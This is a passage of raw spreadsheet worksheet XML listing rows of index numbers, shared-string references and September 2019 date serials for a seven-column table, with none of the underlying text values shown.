        <f t="shared" si="161"/>
        <v>10321</v>
      </c>
      <c r="B10322">
        <v>321</v>
      </c>
      <c r="C10322" t="s">
        <v>19637</v>
      </c>
      <c r="D10322" s="1">
        <v>43710</v>
      </c>
      <c r="E10322" t="s">
        <v>20069</v>
      </c>
      <c r="F10322" t="s">
        <v>10021</v>
      </c>
      <c r="G10322" t="s">
        <v>20070</v>
      </c>
    </row>
    <row r="10323" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10323">
        <f t="shared" si="161"/>
        <v>10322</v>
      </c>
      <c r="B10323">
        <v>322</v>
      </c>
      <c r="C10323" t="s">
        <v>19637</v>
      </c>
      <c r="D10323" s="1">
        <v>43719</v>
      </c>
      <c r="E10323" t="s">
        <v>19750</v>
      </c>
      <c r="F10323" t="s">
        <v>9978</v>
      </c>
      <c r="G10323" t="s">
        <v>20071</v>
      </c>
    </row>
    <row r="10324" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10324">
        <f t="shared" si="161"/>
        <v>10323</v>
      </c>
      <c r="B10324">
        <v>323</v>
      </c>
      <c r="C10324" t="s">
        <v>19637</v>
      </c>
      <c r="D10324" s="1">
        <v>43720</v>
      </c>
      <c r="E10324" t="s">
        <v>19796</v>
      </c>
      <c r="F10324" t="s">
        <v>10021</v>
      </c>
      <c r="G10324" t="s">
        <v>20072</v>
      </c>
    </row>
    <row r="10325" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10325">
        <f t="shared" si="161"/>
        <v>10324</v>
      </c>
      <c r="B10325">
        <v>324</v>
      </c>
      <c r="C10325" t="s">
        <v>19637</v>
      </c>
      <c r="D10325" s="1">
        <v>43735</v>
      </c>
      <c r="E10325" t="s">
        <v>19640</v>
      </c>
      <c r="F10325" t="s">
        <v>9975</v>
      </c>
      <c r="G10325" t="s">
        <v>20073</v>
      </c>
    </row>
    <row r="10326" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10326">
        <f t="shared" si="161"/>
        <v>10325</v>
      </c>
      <c r="B10326">
        <v>325</v>
      </c>
      <c r="C10326" t="s">
        <v>19637</v>
      </c>
      <c r="D10326" s="1">
        <v>43720</v>
      </c>
      <c r="E10326" t="s">
        <v>20074</v>
      </c>
      <c r="F10326" t="s">
        <v>10526</v>
      </c>
      <c r="G10326" t="s">
        <v>20075</v>
      </c>
    </row>
    <row r="10327" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10327">
        <f t="shared" si="161"/>
        <v>10326</v>
      </c>
      <c r="B10327">
        <v>326</v>
      </c>
      <c r="C10327" t="s">
        <v>19637</v>
      </c>
      <c r="D10327" s="1">
        <v>43717</v>
      </c>
      <c r="E10327" t="s">
        <v>19680</v>
      </c>
      <c r="F10327" t="s">
        <v>10021</v>
      </c>
      <c r="G10327" t="s">
        <v>20076</v>
      </c>
    </row>
    <row r="10328" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10328">
        <f t="shared" si="161"/>
        <v>10327</v>
      </c>
      <c r="B10328">
        <v>327</v>
      </c>
      <c r="C10328" t="s">
        <v>19637</v>
      </c>
      <c r="D10328" s="1">
        <v>43730</v>
      </c>
      <c r="E10328" t="s">
        <v>19680</v>
      </c>
      <c r="F10328" t="s">
        <v>10021</v>
      </c>
      <c r="G10328" t="s">
        <v>20077</v>
      </c>
    </row>
    <row r="10329" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10329">
        <f t="shared" si="161"/>
        <v>10328</v>
      </c>
      <c r="B10329">
        <v>328</v>
      </c>
      <c r="C10329" t="s">
        <v>19637</v>
      </c>
      <c r="D10329" s="1">
        <v>43732</v>
      </c>
      <c r="E10329" t="s">
        <v>19643</v>
      </c>
      <c r="F10329" t="s">
        <v>10021</v>
      </c>
      <c r="G10329" t="s">
        <v>20078</v>
      </c>
    </row>
    <row r="10330" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10330">
        <f t="shared" si="161"/>
        <v>10329</v>
      </c>
      <c r="B10330">
        <v>329</v>
      </c>
      <c r="C10330" t="s">
        <v>19637</v>
      </c>
      <c r="D10330" s="1">
        <v>43713</v>
      </c>
      <c r="F10330" t="s">
        <v>10021</v>
      </c>
      <c r="G10330" t="s">
        <v>19708</v>
      </c>
    </row>
    <row r="10331" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10331">
        <f t="shared" si="161"/>
        <v>10330</v>
      </c>
      <c r="B10331">
        <v>330</v>
      </c>
      <c r="C10331" t="s">
        <v>19637</v>
      </c>
      <c r="D10331" s="1">
        <v>43724</v>
      </c>
      <c r="E10331" t="s">
        <v>19663</v>
      </c>
      <c r="F10331" t="s">
        <v>9975</v>
      </c>
      <c r="G10331" t="s">
        <v>20079</v>
      </c>
    </row>
    <row r="10332" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10332">
        <f t="shared" si="161"/>
        <v>10331</v>
      </c>
      <c r="B10332">
        <v>331</v>
      </c>
      <c r="C10332" t="s">
        <v>19637</v>
      </c>
      <c r="D10332" s="1">
        <v>43728</v>
      </c>
      <c r="E10332" t="s">
        <v>19640</v>
      </c>
      <c r="F10332" t="s">
        <v>10021</v>
      </c>
      <c r="G10332" t="s">
        <v>20080</v>
      </c>
    </row>
    <row r="10333" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10333">
        <f t="shared" si="161"/>
        <v>10332</v>
      </c>
      <c r="B10333">
        <v>332</v>
      </c>
      <c r="C10333" t="s">
        <v>19637</v>
      </c>
      <c r="D10333" s="1">
        <v>43732</v>
      </c>
      <c r="E10333" t="s">
        <v>20081</v>
      </c>
      <c r="F10333" t="s">
        <v>10021</v>
      </c>
      <c r="G10333" t="s">
        <v>20082</v>
      </c>
    </row>
    <row r="10334" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10334">
        <f t="shared" si="161"/>
        <v>10333</v>
      </c>
      <c r="B10334">
        <v>333</v>
      </c>
      <c r="C10334" t="s">
        <v>19637</v>
      </c>
      <c r="D10334" s="1">
        <v>43721</v>
      </c>
      <c r="E10334" t="s">
        <v>12781</v>
      </c>
      <c r="F10334" t="s">
        <v>9975</v>
      </c>
      <c r="G10334" t="s">
        <v>20083</v>
      </c>
    </row>
    <row r="10335" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10335">
        <f t="shared" si="161"/>
        <v>10334</v>
      </c>
      <c r="B10335">
        <v>334</v>
      </c>
      <c r="C10335" t="s">
        <v>19637</v>
      </c>
      <c r="D10335" s="1">
        <v>43713</v>
      </c>
      <c r="E10335" t="s">
        <v>19650</v>
      </c>
      <c r="F10335" t="s">
        <v>10021</v>
      </c>
      <c r="G10335" t="s">
        <v>20084</v>
      </c>
    </row>
    <row r="10336" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10336">
        <f t="shared" si="161"/>
        <v>10335</v>
      </c>
      <c r="B10336">
        <v>335</v>
      </c>
      <c r="C10336" t="s">
        <v>19637</v>
      </c>
      <c r="D10336" s="1">
        <v>43724</v>
      </c>
      <c r="E10336" t="s">
        <v>19643</v>
      </c>
      <c r="F10336" t="s">
        <v>10021</v>
      </c>
      <c r="G10336" t="s">
        <v>20085</v>
      </c>
    </row>
    <row r="10337" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10337">
        <f t="shared" si="161"/>
        <v>10336</v>
      </c>
      <c r="B10337">
        <v>336</v>
      </c>
      <c r="C10337" t="s">
        <v>19637</v>
      </c>
      <c r="D10337" s="1">
        <v>43728</v>
      </c>
      <c r="E10337" t="s">
        <v>19638</v>
      </c>
      <c r="F10337" t="s">
        <v>10021</v>
      </c>
      <c r="G10337" t="s">
        <v>20086</v>
      </c>
    </row>
    <row r="10338" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10338">
        <f t="shared" si="161"/>
        <v>10337</v>
      </c>
      <c r="B10338">
        <v>337</v>
      </c>
      <c r="C10338" t="s">
        <v>19637</v>
      </c>
      <c r="D10338" s="1">
        <v>43719</v>
      </c>
      <c r="F10338" t="s">
        <v>10526</v>
      </c>
      <c r="G10338" t="s">
        <v>20087</v>
      </c>
    </row>
    <row r="10339" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10339">
        <f t="shared" si="161"/>
        <v>10338</v>
      </c>
      <c r="B10339">
        <v>338</v>
      </c>
      <c r="C10339" t="s">
        <v>19637</v>
      </c>
      <c r="D10339" s="1">
        <v>43717</v>
      </c>
      <c r="E10339" t="s">
        <v>20088</v>
      </c>
      <c r="F10339" t="s">
        <v>9975</v>
      </c>
      <c r="G10339" t="s">
        <v>20089</v>
      </c>
    </row>
    <row r="10340" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10340">
        <f t="shared" si="161"/>
        <v>10339</v>
      </c>
      <c r="B10340">
        <v>339</v>
      </c>
      <c r="C10340" t="s">
        <v>19637</v>
      </c>
      <c r="D10340" s="1">
        <v>43723</v>
      </c>
      <c r="E10340" t="s">
        <v>19680</v>
      </c>
      <c r="F10340" t="s">
        <v>10021</v>
      </c>
      <c r="G10340" t="s">
        <v>20090</v>
      </c>
    </row>
    <row r="10341" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10341">
        <f t="shared" si="161"/>
        <v>10340</v>
      </c>
      <c r="B10341">
        <v>340</v>
      </c>
      <c r="C10341" t="s">
        <v>19637</v>
      </c>
      <c r="D10341" s="1">
        <v>43727</v>
      </c>
      <c r="E10341" t="s">
        <v>20091</v>
      </c>
      <c r="F10341" t="s">
        <v>10526</v>
      </c>
      <c r="G10341" t="s">
        <v>20092</v>
      </c>
    </row>
    <row r="10342" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10342">
        <f t="shared" si="161"/>
        <v>10341</v>
      </c>
      <c r="B10342">
        <v>341</v>
      </c>
      <c r="C10342" t="s">
        <v>19637</v>
      </c>
      <c r="D10342" s="1">
        <v>43719</v>
      </c>
      <c r="E10342" t="s">
        <v>19917</v>
      </c>
      <c r="F10342" t="s">
        <v>9975</v>
      </c>
      <c r="G10342" t="s">
        <v>20093</v>
      </c>
    </row>
    <row r="10343" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10343">
        <f t="shared" si="161"/>
        <v>10342</v>
      </c>
      <c r="B10343">
        <v>342</v>
      </c>
      <c r="C10343" t="s">
        <v>19637</v>
      </c>
      <c r="D10343" s="1">
        <v>43718</v>
      </c>
      <c r="E10343" t="s">
        <v>19741</v>
      </c>
      <c r="F10343" t="s">
        <v>9975</v>
      </c>
      <c r="G10343" t="s">
        <v>20094</v>
      </c>
    </row>
    <row r="10344" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10344">
        <f t="shared" si="161"/>
        <v>10343</v>
      </c>
      <c r="B10344">
        <v>343</v>
      </c>
      <c r="C10344" t="s">
        <v>19637</v>
      </c>
      <c r="D10344" s="1">
        <v>43725</v>
      </c>
      <c r="E10344" t="s">
        <v>19917</v>
      </c>
      <c r="F10344" t="s">
        <v>9975</v>
      </c>
      <c r="G10344" t="s">
        <v>20095</v>
      </c>
    </row>
    <row r="10345" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10345">
        <f t="shared" si="161"/>
        <v>10344</v>
      </c>
      <c r="B10345">
        <v>344</v>
      </c>
      <c r="C10345" t="s">
        <v>19637</v>
      </c>
      <c r="D10345" s="1">
        <v>43722</v>
      </c>
      <c r="E10345" t="s">
        <v>19680</v>
      </c>
      <c r="F10345" t="s">
        <v>10021</v>
      </c>
      <c r="G10345" t="s">
        <v>20096</v>
      </c>
    </row>
    <row r="10346" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10346">
        <f t="shared" si="161"/>
        <v>10345</v>
      </c>
      <c r="B10346">
        <v>345</v>
      </c>
      <c r="C10346" t="s">
        <v>19637</v>
      </c>
      <c r="D10346" s="1">
        <v>43727</v>
      </c>
      <c r="E10346" t="s">
        <v>20097</v>
      </c>
      <c r="F10346" t="s">
        <v>10526</v>
      </c>
      <c r="G10346" t="s">
        <v>20098</v>
      </c>
    </row>
    <row r="10347" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10347">
        <f t="shared" si="161"/>
        <v>10346</v>
      </c>
      <c r="B10347">
        <v>346</v>
      </c>
      <c r="C10347" t="s">
        <v>19637</v>
      </c>
      <c r="D10347" s="1">
        <v>43719</v>
      </c>
      <c r="E10347" t="s">
        <v>19640</v>
      </c>
      <c r="F10347" t="s">
        <v>9975</v>
      </c>
      <c r="G10347" t="s">
        <v>20099</v>
      </c>
    </row>
    <row r="10348" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10348">
        <f t="shared" si="161"/>
        <v>10347</v>
      </c>
      <c r="B10348">
        <v>347</v>
      </c>
      <c r="C10348" t="s">
        <v>19637</v>
      </c>
      <c r="D10348" s="1">
        <v>43731</v>
      </c>
      <c r="E10348" t="s">
        <v>19750</v>
      </c>
      <c r="F10348" t="s">
        <v>9978</v>
      </c>
      <c r="G10348" t="s">
        <v>20100</v>
      </c>
    </row>
    <row r="10349" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10349">
        <f t="shared" si="161"/>
        <v>10348</v>
      </c>
      <c r="B10349">
        <v>348</v>
      </c>
      <c r="C10349" t="s">
        <v>19637</v>
      </c>
      <c r="D10349" s="1">
        <v>43733</v>
      </c>
      <c r="E10349" t="s">
        <v>20101</v>
      </c>
      <c r="F10349" t="s">
        <v>10526</v>
      </c>
      <c r="G10349" t="s">
        <v>20102</v>
      </c>
    </row>
    <row r="10350" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10350">
        <f t="shared" si="161"/>
        <v>10349</v>
      </c>
      <c r="B10350">
        <v>349</v>
      </c>
      <c r="C10350" t="s">
        <v>19637</v>
      </c>
      <c r="D10350" s="1">
        <v>43736</v>
      </c>
      <c r="E10350" t="s">
        <v>20103</v>
      </c>
      <c r="F10350" t="s">
        <v>10021</v>
      </c>
      <c r="G10350" t="s">
        <v>20104</v>
      </c>
    </row>
    <row r="10351" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10351">
        <f t="shared" si="161"/>
        <v>10350</v>
      </c>
      <c r="B10351">
        <v>350</v>
      </c>
      <c r="C10351" t="s">
        <v>19637</v>
      </c>
      <c r="D10351" s="1">
        <v>43717</v>
      </c>
      <c r="E10351" t="s">
        <v>19650</v>
      </c>
      <c r="F10351" t="s">
        <v>10021</v>
      </c>
      <c r="G10351" t="s">
        <v>20105</v>
      </c>
    </row>
    <row r="10352" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10352">
        <f t="shared" si="161"/>
        <v>10351</v>
      </c>
      <c r="B10352">
        <v>351</v>
      </c>
      <c r="C10352" t="s">
        <v>19637</v>
      </c>
      <c r="D10352" s="1">
        <v>43713</v>
      </c>
      <c r="E10352" t="s">
        <v>19680</v>
      </c>
      <c r="F10352" t="s">
        <v>10021</v>
      </c>
      <c r="G10352" t="s">
        <v>20106</v>
      </c>
    </row>
    <row r="10353" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10353">
        <f t="shared" si="161"/>
        <v>10352</v>
      </c>
      <c r="B10353">
        <v>352</v>
      </c>
      <c r="C10353" t="s">
        <v>19637</v>
      </c>
      <c r="D10353" s="1">
        <v>43716</v>
      </c>
      <c r="E10353" t="s">
        <v>20005</v>
      </c>
      <c r="F10353" t="s">
        <v>9975</v>
      </c>
      <c r="G10353" t="s">
        <v>20107</v>
      </c>
    </row>
    <row r="10354" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10354">
        <f t="shared" si="161"/>
        <v>10353</v>
      </c>
      <c r="B10354">
        <v>353</v>
      </c>
      <c r="C10354" t="s">
        <v>19637</v>
      </c>
      <c r="D10354" s="1">
        <v>43729</v>
      </c>
      <c r="E10354" t="s">
        <v>19640</v>
      </c>
      <c r="F10354" t="s">
        <v>9975</v>
      </c>
      <c r="G10354" t="s">
        <v>20108</v>
      </c>
    </row>
    <row r="10355" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10355">
        <f t="shared" si="161"/>
        <v>10354</v>
      </c>
      <c r="B10355">
        <v>354</v>
      </c>
      <c r="C10355" t="s">
        <v>19637</v>
      </c>
      <c r="D10355" s="1">
        <v>43727</v>
      </c>
      <c r="E10355" t="s">
        <v>20109</v>
      </c>
      <c r="F10355" t="s">
        <v>9978</v>
      </c>
      <c r="G10355" t="s">
        <v>20110</v>
      </c>
    </row>
    <row r="10356" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10356">
        <f t="shared" si="161"/>
        <v>10355</v>
      </c>
      <c r="B10356">
        <v>355</v>
      </c>
      <c r="C10356" t="s">
        <v>19637</v>
      </c>
      <c r="D10356" s="1">
        <v>43724</v>
      </c>
      <c r="E10356" t="s">
        <v>19776</v>
      </c>
      <c r="F10356" t="s">
        <v>10021</v>
      </c>
      <c r="G10356" t="s">
        <v>20111</v>
      </c>
    </row>
    <row r="10357" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10357">
        <f t="shared" si="161"/>
        <v>10356</v>
      </c>
      <c r="B10357">
        <v>356</v>
      </c>
      <c r="C10357" t="s">
        <v>19637</v>
      </c>
      <c r="D10357" s="1">
        <v>43724</v>
      </c>
      <c r="E10357" t="s">
        <v>19640</v>
      </c>
      <c r="F10357" t="s">
        <v>10021</v>
      </c>
      <c r="G10357" t="s">
        <v>20112</v>
      </c>
    </row>
    <row r="10358" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10358">
        <f t="shared" si="161"/>
        <v>10357</v>
      </c>
      <c r="B10358">
        <v>357</v>
      </c>
      <c r="C10358" t="s">
        <v>19637</v>
      </c>
      <c r="D10358" s="1">
        <v>43726</v>
      </c>
      <c r="E10358" t="s">
        <v>20113</v>
      </c>
      <c r="F10358" t="s">
        <v>9978</v>
      </c>
      <c r="G10358" t="s">
        <v>20114</v>
      </c>
    </row>
    <row r="10359" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10359">
        <f t="shared" si="161"/>
        <v>10358</v>
      </c>
      <c r="B10359">
        <v>358</v>
      </c>
      <c r="C10359" t="s">
        <v>19637</v>
      </c>
      <c r="D10359" s="1">
        <v>43730</v>
      </c>
      <c r="E10359" t="s">
        <v>20115</v>
      </c>
      <c r="F10359" t="s">
        <v>10021</v>
      </c>
      <c r="G10359" t="s">
        <v>20116</v>
      </c>
    </row>
    <row r="10360" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10360">
        <f t="shared" si="161"/>
        <v>10359</v>
      </c>
      <c r="B10360">
        <v>359</v>
      </c>
      <c r="C10360" t="s">
        <v>19637</v>
      </c>
      <c r="D10360" s="1">
        <v>43718</v>
      </c>
      <c r="E10360" t="s">
        <v>19705</v>
      </c>
      <c r="F10360" t="s">
        <v>10021</v>
      </c>
      <c r="G10360" t="s">
        <v>20117</v>
      </c>
    </row>
    <row r="10361" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10361">
        <f t="shared" si="161"/>
        <v>10360</v>
      </c>
      <c r="B10361">
        <v>360</v>
      </c>
      <c r="C10361" t="s">
        <v>19637</v>
      </c>
      <c r="D10361" s="1">
        <v>43725</v>
      </c>
      <c r="E10361" t="s">
        <v>20118</v>
      </c>
      <c r="F10361" t="s">
        <v>9978</v>
      </c>
      <c r="G10361" t="s">
        <v>20119</v>
      </c>
    </row>
    <row r="10362" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10362">
        <f t="shared" si="161"/>
        <v>10361</v>
      </c>
      <c r="B10362">
        <v>361</v>
      </c>
      <c r="C10362" t="s">
        <v>19637</v>
      </c>
      <c r="D10362" s="1">
        <v>43713</v>
      </c>
      <c r="E10362" t="s">
        <v>19640</v>
      </c>
      <c r="F10362" t="s">
        <v>9975</v>
      </c>
      <c r="G10362" t="s">
        <v>20120</v>
      </c>
    </row>
    <row r="10363" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10363">
        <f t="shared" si="161"/>
        <v>10362</v>
      </c>
      <c r="B10363">
        <v>362</v>
      </c>
      <c r="C10363" t="s">
        <v>19637</v>
      </c>
      <c r="D10363" s="1">
        <v>43728</v>
      </c>
      <c r="E10363" t="s">
        <v>19640</v>
      </c>
      <c r="F10363" t="s">
        <v>9975</v>
      </c>
      <c r="G10363" t="s">
        <v>20121</v>
      </c>
    </row>
    <row r="10364" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10364">
        <f t="shared" si="161"/>
        <v>10363</v>
      </c>
      <c r="B10364">
        <v>363</v>
      </c>
      <c r="C10364" t="s">
        <v>19637</v>
      </c>
      <c r="D10364" s="1">
        <v>43711</v>
      </c>
      <c r="E10364" t="s">
        <v>19640</v>
      </c>
      <c r="F10364" t="s">
        <v>9975</v>
      </c>
      <c r="G10364" t="s">
        <v>20122</v>
      </c>
    </row>
    <row r="10365" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10365">
        <f t="shared" si="161"/>
        <v>10364</v>
      </c>
      <c r="B10365">
        <v>364</v>
      </c>
      <c r="C10365" t="s">
        <v>19637</v>
      </c>
      <c r="D10365" s="1">
        <v>43720</v>
      </c>
      <c r="E10365" t="s">
        <v>19638</v>
      </c>
      <c r="F10365" t="s">
        <v>10021</v>
      </c>
      <c r="G10365" t="s">
        <v>20123</v>
      </c>
    </row>
    <row r="10366" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10366">
        <f t="shared" si="161"/>
        <v>10365</v>
      </c>
      <c r="B10366">
        <v>365</v>
      </c>
      <c r="C10366" t="s">
        <v>19637</v>
      </c>
      <c r="D10366" s="1">
        <v>43736</v>
      </c>
      <c r="E10366" t="s">
        <v>19640</v>
      </c>
      <c r="F10366" t="s">
        <v>9975</v>
      </c>
      <c r="G10366" t="s">
        <v>20124</v>
      </c>
    </row>
    <row r="10367" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10367">
        <f t="shared" si="161"/>
        <v>10366</v>
      </c>
      <c r="B10367">
        <v>366</v>
      </c>
      <c r="C10367" t="s">
        <v>19637</v>
      </c>
      <c r="D10367" s="1">
        <v>43726</v>
      </c>
      <c r="E10367" t="s">
        <v>19701</v>
      </c>
      <c r="F10367" t="s">
        <v>10021</v>
      </c>
      <c r="G10367" t="s">
        <v>20125</v>
      </c>
    </row>
    <row r="10368" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10368">
        <f t="shared" si="161"/>
        <v>10367</v>
      </c>
      <c r="B10368">
        <v>367</v>
      </c>
      <c r="C10368" t="s">
        <v>19637</v>
      </c>
      <c r="D10368" s="1">
        <v>43733</v>
      </c>
      <c r="E10368" t="s">
        <v>19672</v>
      </c>
      <c r="F10368" t="s">
        <v>10021</v>
      </c>
      <c r="G10368" t="s">
        <v>20126</v>
      </c>
    </row>
    <row r="10369" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10369">
        <f t="shared" si="161"/>
        <v>10368</v>
      </c>
      <c r="B10369">
        <v>368</v>
      </c>
      <c r="C10369" t="s">
        <v>19637</v>
      </c>
      <c r="D10369" s="1">
        <v>43719</v>
      </c>
      <c r="E10369" t="s">
        <v>19668</v>
      </c>
      <c r="F10369" t="s">
        <v>9978</v>
      </c>
      <c r="G10369" t="s">
        <v>20127</v>
      </c>
    </row>
    <row r="10370" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10370">
        <f t="shared" si="161"/>
        <v>10369</v>
      </c>
      <c r="B10370">
        <v>369</v>
      </c>
      <c r="C10370" t="s">
        <v>19637</v>
      </c>
      <c r="D10370" s="1">
        <v>43712</v>
      </c>
      <c r="F10370" t="s">
        <v>10526</v>
      </c>
      <c r="G10370" t="s">
        <v>20128</v>
      </c>
    </row>
    <row r="10371" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10371">
        <f t="shared" ref="A10371:A10434" si="162">+ROW(A10370)</f>
        <v>10370</v>
      </c>
      <c r="B10371">
        <v>370</v>
      </c>
      <c r="C10371" t="s">
        <v>19637</v>
      </c>
      <c r="D10371" s="1">
        <v>43734</v>
      </c>
      <c r="E10371" t="s">
        <v>20129</v>
      </c>
      <c r="F10371" t="s">
        <v>10526</v>
      </c>
      <c r="G10371" t="s">
        <v>20130</v>
      </c>
    </row>
    <row r="10372" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10372">
        <f t="shared" si="162"/>
        <v>10371</v>
      </c>
      <c r="B10372">
        <v>371</v>
      </c>
      <c r="C10372" t="s">
        <v>19637</v>
      </c>
      <c r="D10372" s="1">
        <v>43732</v>
      </c>
      <c r="F10372" t="s">
        <v>10526</v>
      </c>
      <c r="G10372" t="s">
        <v>20131</v>
      </c>
    </row>
    <row r="10373" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10373">
        <f t="shared" si="162"/>
        <v>10372</v>
      </c>
      <c r="B10373">
        <v>372</v>
      </c>
      <c r="C10373" t="s">
        <v>19637</v>
      </c>
      <c r="D10373" s="1">
        <v>43712</v>
      </c>
      <c r="E10373" t="s">
        <v>19640</v>
      </c>
      <c r="F10373" t="s">
        <v>9975</v>
      </c>
      <c r="G10373" t="s">
        <v>20132</v>
      </c>
    </row>
    <row r="10374" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10374">
        <f t="shared" si="162"/>
        <v>10373</v>
      </c>
      <c r="B10374">
        <v>373</v>
      </c>
      <c r="C10374" t="s">
        <v>19637</v>
      </c>
      <c r="D10374" s="1">
        <v>43717</v>
      </c>
      <c r="E10374" t="s">
        <v>20133</v>
      </c>
      <c r="F10374" t="s">
        <v>9978</v>
      </c>
      <c r="G10374" t="s">
        <v>20134</v>
      </c>
    </row>
    <row r="10375" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10375">
        <f t="shared" si="162"/>
        <v>10374</v>
      </c>
      <c r="B10375">
        <v>374</v>
      </c>
      <c r="C10375" t="s">
        <v>19637</v>
      </c>
      <c r="D10375" s="1">
        <v>43736</v>
      </c>
      <c r="E10375" t="s">
        <v>19640</v>
      </c>
      <c r="F10375" t="s">
        <v>9975</v>
      </c>
      <c r="G10375" t="s">
        <v>20135</v>
      </c>
    </row>
    <row r="10376" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10376">
        <f t="shared" si="162"/>
        <v>10375</v>
      </c>
      <c r="B10376">
        <v>375</v>
      </c>
      <c r="C10376" t="s">
        <v>19637</v>
      </c>
      <c r="D10376" s="1">
        <v>43729</v>
      </c>
      <c r="E10376" t="s">
        <v>19796</v>
      </c>
      <c r="F10376" t="s">
        <v>10021</v>
      </c>
      <c r="G10376" t="s">
        <v>20136</v>
      </c>
    </row>
    <row r="10377" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10377">
        <f t="shared" si="162"/>
        <v>10376</v>
      </c>
      <c r="B10377">
        <v>376</v>
      </c>
      <c r="C10377" t="s">
        <v>19637</v>
      </c>
      <c r="D10377" s="1">
        <v>43735</v>
      </c>
      <c r="E10377" t="s">
        <v>19638</v>
      </c>
      <c r="F10377" t="s">
        <v>10021</v>
      </c>
      <c r="G10377" t="s">
        <v>20137</v>
      </c>
    </row>
    <row r="10378" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10378">
        <f t="shared" si="162"/>
        <v>10377</v>
      </c>
      <c r="B10378">
        <v>377</v>
      </c>
      <c r="C10378" t="s">
        <v>19637</v>
      </c>
      <c r="D10378" s="1">
        <v>43709</v>
      </c>
      <c r="F10378" t="s">
        <v>10526</v>
      </c>
      <c r="G10378" t="s">
        <v>20138</v>
      </c>
    </row>
    <row r="10379" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10379">
        <f t="shared" si="162"/>
        <v>10378</v>
      </c>
      <c r="B10379">
        <v>378</v>
      </c>
      <c r="C10379" t="s">
        <v>19637</v>
      </c>
      <c r="D10379" s="1">
        <v>43734</v>
      </c>
      <c r="E10379" t="s">
        <v>19640</v>
      </c>
      <c r="F10379" t="s">
        <v>9975</v>
      </c>
      <c r="G10379" t="s">
        <v>20139</v>
      </c>
    </row>
    <row r="10380" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10380">
        <f t="shared" si="162"/>
        <v>10379</v>
      </c>
      <c r="B10380">
        <v>379</v>
      </c>
      <c r="C10380" t="s">
        <v>19637</v>
      </c>
      <c r="D10380" s="1">
        <v>43738</v>
      </c>
      <c r="F10380" t="s">
        <v>10526</v>
      </c>
      <c r="G10380" t="s">
        <v>20140</v>
      </c>
    </row>
    <row r="10381" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10381">
        <f t="shared" si="162"/>
        <v>10380</v>
      </c>
      <c r="B10381">
        <v>380</v>
      </c>
      <c r="C10381" t="s">
        <v>19637</v>
      </c>
      <c r="D10381" s="1">
        <v>43737</v>
      </c>
      <c r="E10381" t="s">
        <v>19650</v>
      </c>
      <c r="F10381" t="s">
        <v>10021</v>
      </c>
      <c r="G10381" t="s">
        <v>20141</v>
      </c>
    </row>
    <row r="10382" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10382">
        <f t="shared" si="162"/>
        <v>10381</v>
      </c>
      <c r="B10382">
        <v>381</v>
      </c>
      <c r="C10382" t="s">
        <v>19637</v>
      </c>
      <c r="D10382" s="1">
        <v>43722</v>
      </c>
      <c r="F10382" t="s">
        <v>10526</v>
      </c>
      <c r="G10382" t="s">
        <v>20142</v>
      </c>
    </row>
    <row r="10383" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A10383">
        <f t="shared" si="162"/>
        <v>10382</v>
      </c>
      <c r="B10383">
        <v>382</v>
      </c>
      <c r="C10383" t="s">
        <v>19637</v>
      </c>
      <c r="D10383" s="1">
        <v>43733</v>
      </c>
      <c r="E10383" t="s">
        <v>19840</v>
      </c>
      <c r="F10383" t="s">
        <v>10021</v>
      </c>
      <c r="G10383" t="s">
        <v>20143</v>
      </c>
    </row>
    <row r="10384" spans="1:7" x14ac:dyDescent="0.35">
